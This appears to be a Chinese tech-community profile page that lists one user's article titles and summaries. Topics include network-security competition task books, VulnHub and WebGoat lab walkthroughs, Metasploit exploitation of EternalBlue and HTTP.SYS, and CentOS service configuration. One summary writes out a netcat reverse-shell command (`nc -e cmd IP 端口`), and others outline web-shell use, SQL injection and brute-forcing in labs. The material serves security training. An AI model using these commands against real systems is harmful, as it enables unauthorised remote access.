XPcode7_社区达人页

2024年05月

• 05.07 10:32:41
  回答了问题 2024-05-07 10:32:41

  作为一个经典架构模式，事件驱动在云时代为什么会再次流行呢？

  赞1 踩0 评论0
• 04.23 18:38:49
  发表了文章 2024-04-23 18:38:49

  记录一次网络安全应急响应溯源过程

  网络安全应急响应是一种组织在发生网络安全事件时采取的行动，旨在迅速应对和缓解潜在的威胁，最大程度地减少损失并恢复正常的网络运行状态
• 04.23 18:36:46
  发表了文章 2024-04-23 18:36:46

  【通关】WEBGOAT靶场—Path traversal路径遍历第二关

  该漏洞利用涉及上传文件至WebGoat的PathTraversal模块。目标是覆盖`C:\Users\Sec\.webgoat-8.1.0\PathTraversal\`目录下的文件。默认上传位置为`C:\Users\Sec\.webgoat-8.1.0\PathTraversal\Wsec\test`。通过抓包和修改数据包，将上传路径改为上两级目录，实现目标。在POST请求中，添加目录跳转到文件名前，如`../`，然后发送修改后的包，成功完成挑战。
• 04.23 18:35:54
  发表了文章 2024-04-23 18:35:54

  记录VulnHub 靶场——Escalate_Linux渗透测试过程

  本文档描述了一次靶场环境的搭建和渗透测试过程。首先，提供了靶机环境的下载链接，并建议在VMware或VirtualBox中以NAT模式或仅主机模式导入。接着，通过Kali Linux扫描发现靶机IP，并用Nmap扫描开放端口，识别出80、111、139、445、2049等端口。在80端口上找到一个shell.php文件，通过它发现可以利用GET参数传递cmd命令。
• 04.23 18:34:53
  发表了文章 2024-04-23 18:34:53

  Kali部署资产收集工具Kunyu(坤舆)教程

  坤舆（Kunyu）是一款用于网络空间测绘的工具，旨在高效收集企业资产并帮助安全从业者发现未知和暴露的资产。它提供了一个网络空间地图，展示资产、元素及其相互关系，以及它们与现实世界的位置映射。
• 04.23 18:33:45
  发表了文章 2024-04-23 18:33:45

  第十六届山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题—B模块安全事件响应/网络安全数据取证/应用安全

  该内容描述了一次网络安全演练，包括七个部分：Linux渗透提权、内存取证、页面信息发现、数字取证调查、网络安全应急响应、Python代码分析和逆向分析。参与者需在模拟环境中收集Flag值，涉及任务如获取服务器信息、提权、解析内存片段、分析网络数据包、处理代码漏洞、解码逆向操作等。每个部分都列出了若干具体任务，要求提取或生成特定信息作为Flag提交。
• 04.23 18:33:34
  发表了文章 2024-04-23 18:33:34

  第十六届山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题—A模块基础设施设置/安全加固

  该任务是网络安全工程师模拟实战，目标是强化A模块服务器（Windows和Linux）的安全性。任务包括：设置强密码策略，限制用户权限，如禁用命令提示符，隐藏登录用户名；实施Nginx安全策略，禁止目录浏览，限制HTTP请求，调整超时时间，降权运行；配置日志监控，设定不同日志文件大小及覆盖规则；加固SSHD, VSFTPD, IIS服务，修改SSH端口，限制root登录，调整VSFTPD和IIS设置；优化本地安全策略，禁止匿名访问，保护密码存储，控制用户登录；最后，设计防火墙规则，限制SSH枚举，防御DoS攻击，并控制DNS解析请求。所有更改需截图并附说明，按指定格式保存提交。
• 04.23 18:32:27
  发表了文章 2024-04-23 18:32:27

  2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-C安全事件响应/网络安全数据取证/应用安全

  B模块涵盖安全事件响应和应用安全，包括Windows渗透测试、页面信息发现、Linux系统提权及网络安全应急响应。在Windows渗透测试中，涉及系统服务扫描、DNS信息提取、管理员密码、.docx文件名及内容、图片中单词等Flag值。页面信息发现任务包括服务器端口、主页Flag、脚本信息、登录成功信息等。Linux系统渗透需收集SSH端口号、主机名、内核版本，并实现提权获取root目录内容和密码。网络安全应急响应涉及删除后门用户、找出ssh后门时间、恢复环境变量文件、识别修改的bin文件格式及定位挖矿病毒钱包地址。
• 04.23 18:32:12
  发表了文章 2024-04-23 18:32:12

  2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-B-CTF夺旗与攻击

  模块C和D是CTF夺旗比赛，分别侧重攻击和防御。作为渗透测试工程师，你需要在靶机（Linux/Windows）上找寻多种漏洞，如命令注入、文件上传、文件包含、远程代码执行和缓冲区溢出，以获取权限。同时，注意不能攻击裁判服务器，违者将被罚离场。提交靶机的唯一标识flag值并按规则加分。模块D中，你需要在堡垒服务器上发现并修复同样类型的漏洞，保证服务可用性，制作系统防御报告，所有截图需清晰，文件以PDF格式保存提交。
• 04.23 18:32:01
  发表了文章 2024-04-23 18:32:01

  2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-C基础设施设置/安全加固

  网络安全工程师需对AServer08(Win)和AServer09(Linux)进行安全加固，包括密码策略（复杂性、长度），Windows用户管理（所有权、命令提示符、用户名显示），Nginx安全配置（禁止目录浏览、限制HTTP请求、超时设置、降权运行）。日志监控涉及安全、应用和系统日志的最大大小及覆盖策略。中间件服务加固涉及SSH（端口、root登录、计划任务、PID路径），VSFTPD（非特权用户、连接端口、本地用户限制），IIS（日志审计、关闭WebDAV）。本地安全策略涵盖匿名枚举、无登录关闭、凭证存储、权限应用和登录超时
• 04.23 18:31:02
  发表了文章 2024-04-23 18:31:02

  2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-B模块安全事件响应/网络安全数据取证/应用安全

  该文本描述了一组网络安全挑战，涉及Windows渗透测试、数字取证和Web安全。挑战包括使用Kali Linux进行系统扫描、DNS信息提取、管理员密码获取、文件名和内容检索以及图片中单词的识别。此外，还有针对FTPServer的数据包分析，寻找恶意用户活动的痕迹如HTTP访问、端口扫描、密码和木马密码。在Web安全部分，需通过渗透测试不同页面，解决一系列逻辑谜题以获取Flag。最后，有跨站脚本渗透测试，要求访问多个服务器目录并依据页面提示触发弹框以获得Flag。
• 04.23 18:29:51
  发表了文章 2024-04-23 18:29:51

  2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-A-CTF攻击与防御

  模块C和D是CTF夺旗比赛，分别聚焦攻击和防御。攻击者需利用各种漏洞（如命令注入、文件上传、远程代码执行等）攻陷靶机，获取权限，但禁止攻击裁判服务器。防御者则需检测并加固堡垒服务器，确保服务可用性，发现并修补同样类型的漏洞。比赛分数依据靶机的flag值和加固报告，强调不提供补时。操作环境涉及Windows和Linux，选手需使用谷歌浏览器登录。注意提交清晰的截图和PDF报告至U盘。
• 04.23 18:28:42
  发表了文章 2024-04-23 18:28:42

  2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-A模块安全事件响应/网络安全数据取证/应用安全

  该内容描述了一个网络安全挑战，涉及Windows和Linux系统的渗透测试以及隐藏信息探索和内存取证。挑战包括使用Kali Linux对Windows Server进行服务扫描、DNS信息提取、密码获取、文件名和内容查找等。对于Linux系统，任务包括收集服务器信息、提权并查找特定文件内容和密码。此外，还有对Server2007网站的多步骤渗透，寻找登录界面和页面中的隐藏FLAG。最后，需要通过FTP获取win20230306服务器的内存片段，从中提取密码、地址、主机名、挖矿程序信息和浏览器搜索关键词。
• 04.23 18:28:30
  发表了文章 2024-04-23 18:28:30

  2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-A基础设施设置/安全加固

  网络安全工程师需加固A模块的Windows和Linux服务器，措施包括：设置强密码策略，限制用户权限，隐藏登录信息，优化Nginx安全配置如禁止目录浏览，限制HTTP请求，调整超时时间并降权运行。实施日志监控，设置不同日志的最大大小和处理方式。加固SSHD、VSFTPD、IIS服务，修改端口，限制root登录，配置计划任务，限制VSFTPD和IIS的访问权限。加强本地安全策略，阻止匿名枚举，禁止未登录关机，禁用某些权限，超时强制注销。最后，配置Linux防火墙规则，限制SSH连接源，防御DoS攻击，并控制DNS解析请求。操作需截图并以Word转PDF形式保存，命名后提交至U盘。
• 04.23 18:26:54
  发表了文章 2024-04-23 18:26:54

  永恒之蓝（ms17_010）漏洞攻击原理与防护加固

  通过nmap检测到目标服务器开放445端口，疑似存在MS17_010（永恒之蓝）漏洞。利用MSF的eternalblue模块成功入侵，获得system权限，证实漏洞存在。随后，通过禁用并停止Server服务进行加固。再次尝试攻击，显示加固有效，攻击失败。
• 04.23 18:25:06
  发表了文章 2024-04-23 18:25:06

  HTTP.SYS漏洞（MS_15_034）漏洞发现与防护

  通过nmap扫描发现80端口开放，后续使用msfconsole确认了MS_15_034（HTTP.SYS）漏洞的存在，攻击模块触发目标服务器蓝屏。随后进行漏洞加固，禁用IIS缓存，经msf攻击验证，加固措施有效，服务器未受影响。
• 04.23 18:23:48
  发表了文章 2024-04-23 18:23:48

  2024年甘肃省职业院校技能大赛中职组 “网络安全”赛项竞赛样题-C模块安全事件响应/网络安全数据取证/应用安全

  涉及安全事件响应和应用安全测试。需使用Kali对Windows Server2105进行渗透测试，包括服务扫描、DNS信息提取、管理员密码、文件名与内容、图片中单词等。另外，需收集win20230305的服务器端口、页面信息、脚本、登录后信息等。在Linux Server2214上，要获取SSH端口、主机名、内核版本并进行提权操作。网络安全响应针对Server2228，涉及删除后门用户、查找SSH后门时间、恢复环境变量、识别篡改文件格式和矿池钱包地址。最后，对lin20230509进行网站渗透，获取端口号、数据库服务版本、脚本创建时间、页面路径、内核版本和root目录下的flag文件内容
• 04.23 18:21:50
  发表了文章 2024-04-23 18:21:50

  2024年甘肃省职业院校技能大赛中职组 “网络安全”赛项竞赛样题-C模块基础设施设置/安全加固

  网络安全模块A要求对Windows和Linux服务器进行安全加固，包括密码策略（最小13字符，复杂性要求）、用户管理（禁止非管理员命令提示符，隐藏登录信息）、Nginx安全配置（限制HTTP请求，设置超时时间，降权启动）、日志监控（设置日志大小和覆盖策略）、中间件服务加固（SSH、VSFTPD、IIS服务优化）、本地安全策略（禁止匿名访问，保护密码存储，控制关机，限制Everyone权限）和防火墙策略（限制SSH连接源，防御DoS，允许特定DNS请求）。所有更改需清晰截图并附说明，保存为PDF，命名规则为“网络安全模块A-XX”并提交至U盘。
• 04.23 18:20:55
  发表了文章 2024-04-23 18:20:55

  2024年甘肃省职业院校技能大赛中职组“网络安全”赛项竞赛样题-B模块安全事件响应/网络安全数据取证/应用安全

  该内容描述了一组网络安全相关的挑战，涉及Windows渗透测试、数字取证、Web安全和跨站脚本渗透。挑战包括使用Kali Linux对服务器进行扫描，提取特定服务信息、DNS、管理员密码、文件名和内容等。此外，需要分析pcapng数据包文件，找出恶意HTTP访问、扫描端口、密码和木马信息。还有Web渗透测试，需访问不同URL并解决提示以获取Flag。最后，涉及跨站脚本攻击，需在不同目录下满足条件获取弹框信息。每个部分都要求参与者找出特定的安全标志物（Flag）。
• 04.23 18:19:42
  发表了文章 2024-04-23 18:19:42

  2024年甘肃省职业院校技能大赛中职组 “网络安全”赛项竞赛样题-B模块基础设施设置/安全加固

  该文档是关于企业服务器系统安全加固的任务说明，包括Windows和Linux环境。主要涉及密码和登录策略强化（如复杂度、锁定机制）、用户安全管理、本地安全策略设置（如关闭清理内存、禁止未登录关闭、限制软盘访问等）、流量保护、事件监控、服务加固（SSH、VSFTPD、IIS）以及防火墙策略（DNS转发、ping限制、端口禁用、MAC过滤、IP碎片防御、SSH访问控制）。要求对各种配置进行截图并以指定格式保存提交。
• 04.23 18:18:32
  发表了文章 2024-04-23 18:18:32

  2024年甘肃省职业院校技能大赛中职组 “网络安全”赛项竞赛样题-A模块安全事件响应/网络安全数据取证/应用安全

  该文描述了四个网络安全相关任务，涉及Windows和Linux系统的渗透测试、隐藏信息探索及内存取证。任务包括：使用Kali Linux对Windows Server进行服务扫描、DNS信息获取、管理员密码破解等；对Linux系统进行SSH端口、主机名和内核版本收集，以及提权操作；探索隐藏在网站不同位置的FLAG；从内存片段中提取主机信息，如管理员密码、程序地址等；最后是对Linux服务器的渗透，获取端口号、主机名、内核版本和管理员密码等。每个任务都要求提交特定的Flag值作为完成证明。
• 04.23 18:17:24
  发表了文章 2024-04-23 18:17:24

  2024年甘肃省职业院校技能大赛中职组“网络安全”赛项竞赛样题-A模块基础设施设置/安全加固

  网络安全模块A涉及Windows和Linux服务器的安全加固。任务包括：设置强密码策略，限制用户权限（如禁用命令提示符），隐藏登录信息，调整Nginx安全配置，如限制HTTP请求和设置超时时间，降低Nginx服务权限。日志监控要求设置不同日志文件的最大大小和覆盖策略。SSH、VSFTPD和IIS服务需加固，如更改端口，限制root登录，设置计划任务，限制FTP端口和用户活动目录，开启IIS日志审计并关闭WebDAV。本地安全策略涉及禁止匿名访问，防止无登录关机，禁用密码存储等。
• 04.23 18:15:48
  发表了文章 2024-04-23 18:15:48

  2021年职业院校技能大赛“网络安全”项目 江西省比赛任务书—B模块

  B模块涵盖安全事件响应和网络数据取证，涉及多项应用安全挑战。任务包括使用nmap扫描靶机、弱口令登录、生成反弹木马、权限验证、系统内核版本检查、漏洞源码利用、文件名和内容提取等。此外，还有Linux渗透测试，要求访问特定目录下的文件并提取内容。应用服务漏洞扫描涉及服务版本探测、敏感文件发现、私钥解密、权限提升等。SQL注入测试需利用Nmap扫描端口，进行SQL注入并获取敏感信息。应急响应任务包括处理木马、删除恶意用户、修复启动项和清除服务器上的木马。流量分析涉及Wireshark数据包分析，查找黑客IP、枚举测试、服务破解等。渗透测试任务涵盖系统服务扫描、数据库管理、漏洞利用模块搜索等。
• 04.23 18:14:32
  发表了文章 2024-04-23 18:14:32

  2021年职业院校技能大赛“网络安全”项目 江西省比赛任务书—A模块

  该文档是关于企业服务器系统安全加固的任务描述，包括A模块的六个部分：登录安全、Web安全、流量保护与事件监控、防火墙策略、Windows和Linux操作系统安全配置。任务涉及设置密码和登录策略、启用安全日志、限制非法访问、调整防火墙规则、加强操作系统安全和优化服务配置等，以提升网络安全防御能力。每个部分都有具体的配置截图要求，并需按照指定格式保存提交。
• 04.23 18:12:02
  发表了文章 2024-04-23 18:12:02

  Centos7 sendmail服务安装与配置

  该文本描述了在Linux系统中设置邮件服务的步骤。首先，启用httpd的邮件发送功能，然后安装sendmail、sendmail-cf和dovecot。接着配置/sendmail.mc，设定IP和邮件域名。在dovecot配置文件中启用imap、pop3和lmtp协议，取消明文认证限制，设定mail_location，并开启SSL。创建用户mail3和mail4，给予相应权限。停止postfix服务，编辑访问控制、提交配置、本地主机名等文件。最后，重置sendmail、dovecot和saslauthd服务。
• 04.23 18:08:40
  发表了文章 2024-04-23 18:08:40

  【运维系列】Centos7安装并配置PXE服务

  PXE是Intel开发的预启动执行环境，允许工作站通过网络从远程服务器启动操作系统。它依赖DHCP分配IP，DNS服务分配主机名，TFTP提供引导程序，HTTP/FTP/NFS提供安装源。要部署PXE服务器，需关闭selinux和防火墙，安装dhcpd、httpd、tftp、xinetd及相关服务，配置引导文件和Centos7安装源。最后，通过syslinux安装引导文件，并创建pxelinux.cfg/default配置文件来定义启动参数。
• 04.23 18:03:36
  发表了文章 2024-04-23 18:03:36

  【运维系列】Centos7安装并配置postfix服务

  安装CentOS7的Postfix和Dovecot，配置Postfix的`main.cf`文件，包括修改完全域名、允许所有IP、启用邮箱等。然后，配置Dovecot的多个配置文件以启用auth服务和调整相关设置。重启Postfix和Dovecot，设置开机自启，并关闭防火墙进行测试。最后，创建邮箱账户并在Windows邮箱客户端中添加账户设置。
• 04.23 17:58:46
  发表了文章 2024-04-23 17:58:46

  【运维系列】Centos7安装配置ntp服务

  配置yum并安装ntp，编辑ntp配置文件，取消17行注释，适应本机网段，22行设置使用本地时间。关闭防火墙，重启ntp服务。测试时先关闭防火墙，然后使用ntpdate命令成功同步时间。
• 04.23 17:57:23
  发表了文章 2024-04-23 17:57:23

  Centos7 nfs常用命令详解

  `/etc/exports`是NFS服务的配置文件，定义了共享给客户端的文件系统和访问规则。共享目录、客户端IP或域名、以及访问权限和用户映射选项是其主要内容。客户端指定方式包括IP地址、子网、域名或通配符。选项包括读写权限（ro/rw）、用户映射（如root_squash/no_root_squash/all_squash）和其他设置（sync/async/secure/insecure等）。`exportfs -r`用于重新应用配置。配置示例：`/opt/test`共享给192.168.1.0/24，权限为rw，同步写入（sync）。注意，不建议开启no_root_squash以确保安全。
• 04.23 17:30:43
  发表了文章 2024-04-23 17:30:43

  Centos7 配置DNS服务

  该教程指导配置DNS服务器：首先通过yum安装bind和cach件，然后修改IP设置。接着，编辑/etc/named.conf，将第13行和21行的参数改为"any"。在/etc/named.rfc1912中更新正向和反向域名。创建正向解析文件/var/named.localhost和反向解析文件/var/named.loopback，按指定格式添加解析记录。最后，重启服务，确保防火墙关闭，通过nslookup检查DNS配置效果。
• 04.23 17:29:01
  发表了文章 2024-04-23 17:29:01

  Centos7CA认证中心

  CA是Certificate Authority的缩写，负责发放、更新、撤销和验证数字证书，用于身份认证和数据不可否认性，常通过443端口。配置CA涉及修改openssl.cnf，创建并设置认证中心，删除并新建index文件。客户端则需生成密钥和CSR，将CSR发送至CA，CA签名后回传证书。最终，客户端可查看收到的证书。
• 04.23 17:27:03
  发表了文章 2024-04-23 17:27:03

  Centos7 修改密码策略和用户策略

  在`/etc/login.defs`文件中，配置了邮件存储路径、密码控制策略、UID和GID范围、用户目录创建、umask权限及用户删除选项。密码策略规定：最大使用天数为99999，最小改变间隔为0天，最短长度为5字符，提前7天警告。UID和GID范围设为5000-60000。创建家目录默认开启，umask设为077，且支持删除用户时移除无成员的用户组。
• 04.23 17:22:52
  发表了文章 2024-04-23 17:22:52

  linux如何编译安装源码包软件

  源码包软件是包含源代码的软件包，常见于Linux和BSD系统，如fcitx和Lumaqq。开源软件需满足源代码可见且有宽松许可，如GPL。安装源码包通常涉及解压、编译和安装步骤，使用`tar`命令解包，通过`./configure`, `make`, `make install`进行编译安装。软件源码允许定制和二次开发，但须遵循许可协议。安装前确保安装了必要的开发工具和库。对于perl和python程序，直接使用perl或python命令安装。推荐使用系统软件包管理工具如RPM、yum或apt进行管理，以简化流程。
• 04.23 17:21:50
  发表了文章 2024-04-23 17:21:50

  linuxdd命令备份与恢复

  `dd`命令实例：用于备份/恢复磁盘，如`dd if=/dev/hdb of=/dev/hdd`复制整个硬盘。还能压缩备份(`dd if=/dev/hdb | gzip > /root/image.gz`)、恢复(`gzip -dc /root/image.gz | dd of=/dev/hdb`)、备份MBR(`dd if=/dev/hda of=/root/image count=1 bs=512`)、创建swap分区(`dd if=/dev/zero of=/swapfile`)
• 04.23 17:20:19
  发表了文章 2024-04-23 17:20:19

  Centos6.5搭建一个简单的vsftpd服务

  在CentOS 6.5上配置vsftpd服务器：确保与Win10能互通，更新yum源，安装vsftpd，编辑配置文件禁用匿名访问，重启服务并关闭防火墙。创建新用户和密码，通过FTP在Win10文件管理器中使用实验机IP访问，用创建的用户和密码登录，成功创建远程文件夹，实验机上可见。
• 04.23 17:17:43
  发表了文章 2024-04-23 17:17:43

  Centos6.5安装并配置NFS服务

  该内容描述了在Linux系统中设置NFS服务的步骤。首先挂载yum源，然后安装NFS服务，并编辑配置文件。接着，重启rpcbind和NFS服务，可能需要重复此过程以解决初始可能出现的问题。此外，关闭防火墙策略，并再次重启服务。最终，根目录被共享，特定IP网段被允许访问。
• 04.23 17:16:23
  发表了文章 2024-04-23 17:16:23

  Centos6.5安装并配置Telnet服务

  该内容是一个关于如何安装配置Telnet服务的教程。首先，通过yum安装vim、xinetd、telnet和telnet-server。接着，修改/etc/xinetd.d/telnet配置文件，将disable改为no，并设置访问限制（如限定特定网段和时间）。关闭防火墙，重启服务。创建测试用户后，分别使用CentOS和Windows的Telnet客户端进行连接测试，显示成功，实验完成。
• 04.23 17:13:51
  发表了文章 2024-04-23 17:13:51

  Centos6.5安装配置autofs服务

  配置IP地址和挂载yum源后，安装autofs：`yum -y install autofs`。编辑配置文件 `/etc/auto.misc` 和 `/etc/auto.master`，示例中展示了将yum源路径添加到auto.master。关闭防火墙并重启autofs服务以应用更改。
• 04.23 17:11:44
  发表了文章 2024-04-23 17:11:44

  Centos6.5安装并配置samba服务

  配置Samba服务，执行`yum -y install samba`。创建finance、sales、manager组及对应用户：user1, user2（finance组），user3（sales组），manager（manager组）。设定用户密码。创建共享目录，给予finance组对finance目录的读写权限，编辑`smb.conf`。manager拥有所有共享目录的读写权限。确保用户对其共享文件夹有完全权限，其他用户只读写。重启服务。共享/opt/public_share为share，创建无登陆权用户Tonny，允许所有用户读写，文件属主为Tonny。最后，重启服务。
• 04.23 17:08:11
  发表了文章 2024-04-23 17:08:11

  Linux系统常用命令大全

  Linux操作系统常用命令大全
• 04.23 17:04:35
  发表了文章 2024-04-23 17:04:35

  Centos6.5管理与ROOT密码重置

  本文介绍了如何在CentOS 6.5中使用Xshell等工具进行远程管理，并详细阐述了当忘记ROOT密码时的重置步骤。通过开机按ESC进入启动菜单，选择编辑模式（按e键），在quiet后添加simple或1，回车，然后按b键进入单用户模式。在该模式下，使用`passwd root`命令设置新密码，重启系统(reboot)后，新密码生效。
• 04.23 17:01:50
  发表了文章 2024-04-23 17:01:50

  Centos7安装mariadb数据库

  该文介绍了如何在CentOS7上安装MariaDB数据库。MariaDB是MySQL的开源分支，旨在保持与MySQL的兼容性。安装过程包括配置yum源，执行安装命令，启动数据库服务，并设置开机启动。首次启动时，数据库未设置密码，用户可直接回车。
• 04.23 16:59:38
  发表了文章 2024-04-23 16:59:38

  Centos6.5配置网络适配器

  使用`vi /etc/sysconfig/network/ifcfg-eth0`配置网卡，将ONBOOT设为YES，移除dhcp，设定IP为192.168.10.1，子网掩码255.255.255.0，网关192.168.10.254。可选设置DNS。最后，重启网络服务`service network restart`。
• 04.23 16:43:21
  发表了文章 2024-04-23 16:43:21

  VulnHub 靶场--super-Mario-Host超级马里奥主机渗透测试过程

  这篇文章描述了在一个网络安全靶场环境中进行渗透测试的过程。首先，从百度网盘下载并导入虚拟机镜像，然后将其网络设置为NAT或仅主机模式。接下来，通过扫描靶机IP地址的本地网络段，发现靶机IP为192.168.220.135，并且了解到靶机上有一个名为“mario.supermariohost.local”的Web服务，运行在8180端口。尝试SSH弱口令攻击失败后，通过信息收集找到一个名为“luigi.php”的页面，其中包含一段英文提示，提示需要将域名添加到hosts文件中。 通过cewl工具从luigi.php生成字典文件passwords，然后使用hydra工具尝试SSH登录，成功获得l
• 04.23 16:42:07
  发表了文章 2024-04-23 16:42:07

  基于Vulnhub—DC8靶场渗透测试过程

  这篇文章描述了一个渗透测试的过程。首先，作者下载了一个名为DC8的靶场环境并将其导入虚拟机软件，将网络设置为NAT或仅主机模式。然后进行了信息收集，通过ARP扫描发现靶机IP，并使用nmap扫描开放端口，发现80和22端口开放。进一步利用SQL注入漏洞，通过sqlmap工具获取了数据库中的用户名和密码
• 04.23 16:39:44
  发表了文章 2024-04-23 16:39:44

  基于Vulnhub靶场—DC4渗透测试过程

  Vulhub是一个开源项目，专注于安全漏洞的复现和学习。包括Web应用、容器和操作系统漏洞。项目特点包括丰富的漏洞场景、详细的复现指南、便捷的环境部署和持续更新。通过Vulhub，安全从业者可以学习和研究漏洞利用技术。此外，文章还介绍了如何下载和搭建Vulhub靶机DC-4，并详细描述了利用Burp Suite进行密码爆破和命令执行，最终获取root权限的过程。
• 04.23 16:37:48
  发表了文章 2024-04-23 16:37:48

  Windows环境下安装nc工具

  本文介绍了网络工具Netcat（nc）的下载、配置和基础使用。首先提供了nc的下载链接，建议在安装时避免中文路径并关闭杀毒软件。接着，展示了配置nc环境变量的步骤，包括在系统设置中进行相关操作。然后，通过开启两个命令行窗口进行简单的验证测试，如监听端口（nc -l -p9000）和建立连接（nc localhost 9000）。最后，提到了nc的多功能性，如端口监听、扫描、文件传输和远程shell，并列出了一些常用参数选项，例如 `-l` (监听模式) 和 `-p` (指定端口)。
• 04.23 16:36:18
  发表了文章 2024-04-23 16:36:18

  nc简单反弹shell

  该内容描述了在Windows和Linux环境中使用`nc`（Netcat）工具建立反弹shell的过程。在Windows上，反弹端通过命令`nc -e cmd IP 端口`将控制权反弹到指定IP；控制端则运行`nc -lvvp 端口`等待连接。在Linux环境下，类似地，使用`nc -l -v -p 端口`作为控制端，而被控端用`nc 目标IP 端口`进行连接。文中还包含相关截图以辅助说明。
• 04.23 16:34:46
  发表了文章 2024-04-23 16:34:46

  渗透测试常用名词术语介绍

  渗透测试常用名词术语介绍